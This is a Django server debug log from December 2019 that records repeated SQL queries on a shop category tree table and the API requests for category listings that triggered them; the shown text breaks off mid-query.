(0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:16:02] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 06:16:07,180 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:16:07,187 utils 4252 140031503103744 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 15; args=(15,) DEBUG 2019-12-20 06:16:07,192 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:16:07,196 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:16:07,196 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:16:07,199 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [20/Dec/2019 06:16:07] "GET /api/v1/categories/15 HTTP/1.0" 200 223 DEBUG 2019-12-20 06:16:07,203 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:16:07,205 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:16:07,207 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:16:07,210 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:16:07,212 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:16:07,216 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:16:07,220 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:16:07,224 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:16:07,228 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:16:07,232 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:16:07,237 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:16:07,241 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:16:07,245 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:16:07,248 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:16:07,251 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:16:07,257 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:16:07,260 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:16:07,264 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:16:07,267 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:16:07,270 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:16:07,274 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:16:07,281 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:16:07,285 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:16:07,288 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:16:07,292 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:16:07,296 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:16:07,301 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:16:07,304 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:16:07,307 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:16:07,311 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:16:07,316 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:16:07,323 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:16:07,327 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:16:07,330 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:16:07,334 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:16:07,338 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:16:07,341 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:16:07,349 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:16:07,353 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:16:07,357 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:16:07,362 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:16:07,366 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:16:07] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 06:16:10,282 utils 4252 140031732287232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 20; args=(20,) DEBUG 2019-12-20 06:16:10,287 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) [20/Dec/2019 06:16:10] "GET /api/v1/categories/20 HTTP/1.0" 200 199 DEBUG 2019-12-20 06:16:10,291 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:16:10,298 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:16:10,302 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:16:10,305 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:16:10,308 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:16:10,311 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:16:10,313 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:16:10,315 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:16:10,318 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:16:10,322 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:16:10,324 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:16:10,326 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:16:10,329 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:16:10,331 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:16:10,336 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:16:10,339 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:16:10,341 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", 